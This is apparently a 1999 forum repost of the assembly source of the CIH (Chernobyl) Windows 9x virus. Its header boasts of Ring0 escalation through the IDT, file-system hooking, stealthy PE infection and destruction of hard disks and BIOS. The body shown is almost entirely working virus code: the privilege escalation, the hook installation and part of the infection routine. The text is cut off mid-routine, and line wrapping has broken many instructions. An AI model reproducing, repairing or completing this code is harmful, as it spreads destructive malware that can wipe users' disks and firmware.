发信人: williamlong()
整理人: williamlong(1999-04-28 11:35:27), 站内信件
|
; ********************************************************************
********
; * The Virus Program Information
*
; ********************************************************************
********
; *
*
; * Designer : CIH Source : TTIT of TATUNG in Tai
wan *
; * Create Date : 04/26/1998 Now Version : 1.4
*
; * Modification Time : 05/31/1998
*
; *
*
; * Turbo Assembler Version 4.0 : tasm /m cih
*
; * Turbo Link Version 3.01 : tlink /3 /t cih, cih.exe
*
; *
*
; *===================================================================
=======*
; * Modification History
*
; *===================================================================
=======*
; * v1.0 1. Create the Virus Program.
*
; * 2. The Virus Modifies IDT to Get Ring0 Privilege.
*
; * 04/26/1998 3. Virus Code doesn't Reload into System.
*
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File S
ystem. *
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApi
Hook. *
; * 6. When System Opens Existing PE File, the File will b
e *
; * Infected, and the File doesn't be Reinfected.
*
; * 7. It is also Infected, even the File is Read-Only.
*
; * 8. When the File is Infected, the Modification Date an
d Time *
; * of the File also don't be Changed.
*
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not
Call *
; * Previous FileSystemApiHook, it will Call the Functi
on *
; * that the IFS Manager Would Normally Call to Impleme
nt *
; * this Particular I/O Request.
*
; * 10. The Virus Size is only 656 Bytes.
*
; *===================================================================
=======*
; * v1.1 1. Especially, the File that be Infected will not Incr
ease *
; * it's Size... ^__^
*
; * 05/15/1998 2. Hook and Modify Structured Exception Handing.
*
; * When Exception Error Occurs, Our OS System should b
e in *
; * Windows NT. So My Cute Virus will not Continue to R
un, *
; * it will Jmup to Original Application to Run.
*
; * 3. Use Better Algorithm, Reduce Virus Code Size.
*
; * 4. The Virus "Basic" Size is only 796 Bytes.
*
; *===================================================================
=======*
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer...
*
; * 2. Modify the Bug of v1.1
*
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes.
*
; *===================================================================
=======*
; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Er
ror. *
; * So When Open WinZip Self-Extractor ==> Don't Infect
it. *
; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes.
*
; *===================================================================
=======*
; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs
Error. *
; * 2. Change the Date of Killing Computers.
*
; * 05/31/1998 3. Modify Virus Version Copyright.
*
; * 4. The Virus "Basic" Size is 1019 Bytes.
*
; ********************************************************************
********
.586P
; ********************************************************************
********
; * Original PE Executable File(Don't Modify this Section)
*
; ********************************************************************
********
OriginalAppEXE SEGMENT
FileHeader:
db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
dd 00000000h, VirusSize
lea ecx, StopToRunVirusCode-@0[ebx]
push ecx
push eax
; *************************************
; * Let's Modify *
; * IDT(Interrupt Descriptor Table) *
; * to Get Ring0 Privilege... *
; *************************************
push eax ;
sidt [esp-02h] ; Get IDT Base Address
pop ebx ;
add ebx, HookExceptionNumber*08h+04h ; ZF
= 0
cli
mov ebp, [ebx] ; Get Exception Base
mov bp, [ebx-04h] ; Entry Point
lea esi, MyExceptionHook-@1[ecx]
push esi
mov [ebx-04h], si ;
shr esi, 16 ; Modify Excep
tion
mov [ebx+02h], si ; Entry Point
Address
pop esi
; *************************************
; * Generate Exception to Get Ring0 *
; *************************************
int HookExceptionNumber ; GenerateExce
ption
ReturnAddressOfEndException = $
; *************************************
; * Merge All Virus Code Section *
; *************************************
; *************************************
; * Generate Exception Again *
; *************************************
int HookExceptionNumber ; GenerateExce
ption Aga
; *************************************
; * Let's Restore *
; * Structured Exception Handing *
; *************************************
ReadyRestoreSE:
sti
xor ebx, ebx
jmp RestoreSE
; *************************************
; * When Exception Error Occurs, *
; * Our OS System should be in NT. *
; * So My Cute Virus will not *
; * Continue to Run, it Jmups to *
; * Original Application to Run. *
; *************************************
StopToRunVirusCode:
@1 = StopToRunVirusCode
xor ebx, ebx
mov eax, fs:[ebx]
mov esp, [eax]
RestoreSE:
pop dword ptr fs:[ebx]
pop eax
; *************************************
; * Return Original App to Execute *
; *************************************
pop ebp
push 00401000h ; Push Original
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to S
tack
ret ; Return to Original App Entry Point
; *********************************************************
; * Ring0 Virus Game Initial Program *
; *********************************************************
MyExceptionHook:
@2 = MyExceptionHook
jz InstallMyFileSystemApiHook
; *************************************
; * Do My Virus Exist in System !? *
; *************************************
mov ecx, dr0
jecxz AllocateSystemMemoryPage
add dword ptr [esp], ReadyRestoreSE-Return
AddressOf
dException
; *************************************
; * Return to Ring3 Initial Program *
; *************************************
ExitRing0Init:
mov [ebx-04h], bp ;
shr ebp, 16 ; Restore Exception
mov [ebx+02h], bp ;
iretd
; *************************************
; * Allocate SystemMemory Page to Use *
; *************************************
AllocateSystemMemoryPage:
mov dr0, ebx ; Set the Mark of My V
irus Exis
in System
push 00000000fh ;
push ecx ;
push 0ffffffffh ;
push ecx ;
push ecx ;
push ecx ;
push 000000001h ;
push 000000002h ;
int 20h ; VMMCALL _PageAllocat
e
_PageAllocate = $ ;
dd 00010053h ; Use EAX, ECX, EDX, a
nd flags
add esp, 08h*04h
xchg edi, eax ; EDI = SystemMemory S
tart Addr
s
lea eax, MyVirusStart-@2[esi]
iretd ; Return to Ring3 Initial Program
; *************************************
; * Install My File System Api Hook *
; *************************************
InstallMyFileSystemApiHook:
lea eax, FileSystemApiHook-@6[edi]
push eax ;
int 20h ; VXDCALL IFSMgr_InstallFileSyste
mApiHook
IFSMgr_InstallFileSystemApiHook = $ ;
dd 00400067h ; Use EAX, ECX, EDX, a
nd flags
mov dr0, eax ; Save OldFileSystemAp
iHook Add
ss
pop eax ; EAX = FileSystemApiHook Addr
ess
; Save Old IFSMgr_InstallFileSystemApiHook Ent
ry Point
mov ecx, IFSMgr_InstallFileSystemApiHook-@
2[esi]
mov edx, [ecx]
mov OldInstallFileSystemApiHook-@3[eax], e
dx
; Modify IFSMgr_InstallFileSystemApiHook Entry
Point
lea eax, InstallFileSystemApiHook-@3[eax]
mov [ecx], eax
cli
jmp ExitRing0Init
; *********************************************************
; * Code Size of Merge Virus Code Section *
; *********************************************************
CodeSizeOfMergeVirusCodeSection = offset $
; *********************************************************
; * IFSMgr_InstallFileSystemApiHook *
; *********************************************************
InstallFileSystemApiHook:
push ebx
call @4 ;
@4: ;
pop ebx ; mov ebx, offset FileSystemAp
iHook
add ebx, FileSystemApiHook-@4 ;
push ebx
int 20h ; VXDCALL IFSMgr_RemoveFileSystem
ApiHook
IFSMgr_RemoveFileSystemApiHook = $
dd 00400068h ; Use EAX, ECX, EDX, a
nd flags
pop eax
; Call Original IFSMgr_InstallFileSystemApiHoo
k
; to Link Client FileSystemApiHook
push dword ptr [esp+8]
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx
push eax
; Call Original IFSMgr_InstallFileSystemApiHoo
k
; to Link My FileSystemApiHook
push ebx
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx
mov dr0, eax ; Adjust OldFileSystem
ApiHook A
ress
pop eax
pop ebx
ret
; *********************************************************
; * Static Data *
; *********************************************************
OldInstallFileSystemApiHook dd ?
; *********************************************************
; * IFSMgr_FileSystemHook *
; *********************************************************
; *************************************
; * IFSMgr_FileSystemHook Entry Point *
; *************************************
FileSystemApiHook:
@3 = FileSystemApiHook
pushad
call @5 ;
@5: ;
pop esi ; mov esi, offset VirusGameDat
aStartAdd
ss
add esi, VirusGameDataStartAddress-@5
; *************************************
; * Is OnBusy !? *
; *************************************
test byte ptr (OnBusy-@6)[esi], 01h ; if (
OnBusy )
jnz pIFSFunc ; goto
pIFSFunc
; *************************************
; * Is OpenFile !? *
; *************************************
; if ( NotOpenFile )
; goto prevhook
lea ebx, [esp+20h+04h+04h]
cmp dword ptr [ebx], 00000024h
jne prevhook
; *************************************
; * Enable OnBusy *
; *************************************
inc byte ptr (OnBusy-@6)[esi] ; Enab
le OnBusy
; *************************************
; * Get FilePath's DriveNumber, *
; * then Set the DriveName to *
; * FileNameBuffer. *
; *************************************
; * Ex. If DriveNumber is 03h, *
; * DriveName is 'C:'. *
; *************************************
; mov esi, offset FileNameBuffer
add esi, FileNameBuffer-@6
push esi
mov al, [ebx+04h]
cmp al, 0ffh
je CallUniToBCSPath
add al, 40h
mov ah, ':'
mov [esi], eax
inc esi
inc esi
; *************************************
; * UniToBCSPath *
; *************************************
; * This Service Converts *
; * a Canonicalized Unicode Pathname *
; * to a Normal Pathname in the *
; * Specified BCS Character Set. *
; *************************************
CallUniToBCSPath:
push 00000000h
push FileNameBufferSize
mov ebx, [ebx+10h]
mov eax, [ebx+0ch]
add eax, 04h
push eax
push esi
int 20h ; VXDCall UniToBCSPath
UniToBCSPath = $
dd 00400041h
add esp, 04h*04h
; *************************************
; * Is FileName '.EXE' !? *
; *************************************
; cmp [esi+eax-04h], '.EXE'
cmp [esi+eax-04h], 'EXE.'
pop esi
jne DisableOnBusy
IF DEBUG
; *************************************
; * Only for Debug *
; *************************************
; cmp [esi+eax-06h], 'FUCK'
cmp [esi+eax-06h], 'KCUF'
jne DisableOnBusy
ENDIF
; *************************************
; * Is Open Existing File !? *
; *************************************
; if ( NotOpenExistingFile )
; goto DisableOnBusy
cmp word ptr [ebx+18h], 01h
jne DisableOnBusy
; *************************************
; * Get Attributes of the File *
; *************************************
mov ax, 4300h
int 20h ; VXDCall IFSMgr_Ring0_FileIO
IFSMgr_Ring0_FileIO = $
dd 00400032h
jc DisableOnBusy
push ecx
; *************************************
; * Get IFSMgr_Ring0_FileIO Address *
; *************************************
mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7
)[esi]
mov edi, [edi]
; *************************************
; * Is Read-Only File !? *
; *************************************
test cl, 01h
jz OpenFile
; *************************************
; * Modify Read-Only File to Write *
; *************************************
mov ax, 4301h
xor ecx, ecx
call edi ; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Open File *
; *************************************
OpenFile:
xor eax, eax
mov ah, 0d5h
xor ecx, ecx
xor edx, edx
inc edx
mov ebx, edx
inc ebx
call edi ; VXDCall IFSMgr_Ring0_FileIO
xchg ebx, eax ; mov ebx, FileHandle
; *************************************
; * Need to Restore *
; * Attributes of the File !? *
; *************************************
pop ecx
pushf
test cl, 01h
jz IsOpenFileOK
; *************************************
; * Restore Attributes of the File *
; *************************************
mov ax, 4301h
call edi ; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Is Open File OK !? *
; *************************************
IsOpenFileOK:
popf
jc DisableOnBusy
; *************************************
; * Open File Already Succeed. ^__^ *
; *************************************
push esi ; Push FileNameBuffer Address
to Stack
pushf ; Now CF = 0, Push Flag to Sta
ck
add esi, DataBuffer-@7 ; mov esi, offset D
ataBuffer
; ***************************
; * Get OffsetToNewHeader *
; ***************************
xor eax, eax
mov ah, 0d6h
; For Doing Minimal VirusCode's Length,
; I Save EAX to EBP.
mov ebp, eax
push 00000004h
pop ecx
push 0000003ch
pop edx
call edi ; VXDCall IFSMgr_Ring0_FileIO
; * EDX = 'PE\0\0' Signature of *
; * ImageFileHeader Pointer's *
; * Former Byte. *
; * ESI = DataBuffer Address ==> @8 *
; * EDI = IFSMgr_Ring0_FileIO Address *
; * EBP = D600h ==> Read Data in File *
; *************************************
; * Stack Dump : *
; * *
; * ESP => ------------------------- *
; * | EFLAG(CF=0) | *
; * ------------------------- *
; * | FileNameBufferPointer | *
; * ------------------------- *
; * | EDI | *
; * ------------------------- *
; * | ESI | *
; * ------------------------- *
; * | EBP | *
; * ------------------------- *
; * | ESP | *
; * ------------------------- *
; * | EBX | *
; * ------------------------- *
; * | EDX | *
; * ------------------------- *
; * | ECX | *
; * ------------------------- *
; * | EAX | *
; * ------------------------- *
; * | Return Address | *
; * ------------------------- *
; *************************************
push ebx ; Save File Handle
push 00h ; Set VirusCodeSectionTableEnd
Mark
; ***************************
; * Let's Set the *
; * Virus' Infected Mark *
; ***************************
push 01h ; Size
push edx ; Pointer of File
push edi ; Address of Buffer
; ***************************
; * Save ESP Register *
; ***************************
mov dr1, esp
; ***************************
; * Let's Set the *
; * NewAddressOfEntryPoint *
; * ( Only First Set Size ) *
; ***************************
push eax ; Size
; ***************************
; * Let's Read *
; * Image Header in File *
; ***************************
mov eax, ebp
mov cl, SizeOfImageHeaderToRead
add edx, 07h ; Move EDX to NumberOfSection
s
call edi ; VXDCall IFSMgr_Ring0_FileIO
; ***************************
; * Let's Set the *
; * NewAddressOfEntryPoint *
; * ( Set Pointer of File, *
; * Address of Buffer ) *
; ***************************
lea eax, (AddressOfEntryPoint-@8)[edx]
push eax ; Pointer of File
lea eax, (NewAddressOfEntryPoint-@8)[esi]
push eax ; Address of Buffer
; ***************************
; * Move EDX to the Start *
; * of SectionTable in File *
; ***************************
movzx eax, word ptr (SizeOfOptionalHeader-@8
)[esi]
lea edx, [eax+edx+12h]
; ***************************
; * Let's Get *
; * Total Size of Sections *
; ***************************
mov al, SizeOfScetionTable
; I Assume NumberOfSections <= 0ffh
mov cl, (NumberOfSections-@8)[esi]
mul cl
; ***************************
; * Let's Set Section Table *
; ***************************
; Move ESI to the Start of SectionTable
lea esi, (StartOfSectionTable-@8)[esi]
push eax ; Size
push edx ; Pointer of File
push esi ; Address of Buffer
; ***************************
; * The Code Size of Merge *
; * Virus Code Section and *
; * Total Size of Virus *
; * Code Section Table Must *
; * be Small or Equal the *
; * Unused Space Size of *
; * Following Section Table *
; ***************************
inc ecx
push ecx ; Save NumberOfSections+1
shl ecx, 03h
push ecx ; Save TotalSizeOfVirusCodeSec
tionTable
add ecx, eax
add ecx, edx
sub ecx, (SizeOfHeaders-@9)[esi]
not ecx
inc ecx
; Save My Virus First Section Code
; Size of Following Section Table...
; ( Not Include the Size of Virus Code Section
Table )
push ecx
xchg ecx, eax ; ECX = Size of Sectio
n Table
; Save Original Address of Entry Point
mov eax, (AddressOfEntryPoint-@9)[esi]
add eax, (ImageBase-@9)[esi]
mov (OriginalAddressOfEntryPoint-@9)[esi],
eax
cmp word ptr [esp], small CodeSizeOfMergeV
irusCodeS
tion
jl OnlySetInfectedMark
; ***************************
; * Read All Section Tables *
; ***************************
mov eax, ebp
call edi ; VXDCall IFSMgr_Ring0_FileIO
; ***************************
; * Full Modify the Bug : *
; * WinZip Self-Extractor *
; * Occurs Error... *
; ***************************
; * So When User Opens *
; * WinZip Self-Extractor, *
; * Virus Doesn't Infect it.*
; ***************************
; * First, Virus Gets the *
; * PointerToRawData in the *
; * Second Section Table, *
; * Reads the Section Data, *
; * and Tests the String of *
; * 'WinZip(R)'...... *
; ***************************
xchg eax, ebp
push 00000004h
pop ecx
push edx
mov edx, (SizeOfScetionTable+PointerToRawD
ata-@9)[e
]
add edx, 12h
call edi ; VXDCall IFSMgr_Ring0_FileIO
; cmp [esi], 'nZip'
cmp dword ptr [esi], 'piZn'
je NotSetInfectedMark
pop edx
; ***************************
; * Let's Set Total Virus *
; * Code Section Table *
; ***************************
; EBX = My Virus First Section Code
; Size of Following Section Table
pop ebx
pop edi ; EDI = TotalSizeOfVirusCodeSe
ctionTabl
pop ecx ; ECX = NumberOfSections+1
push edi ; Size
add edx, ebp
push edx ; Pointer of File
add ebp, esi |
|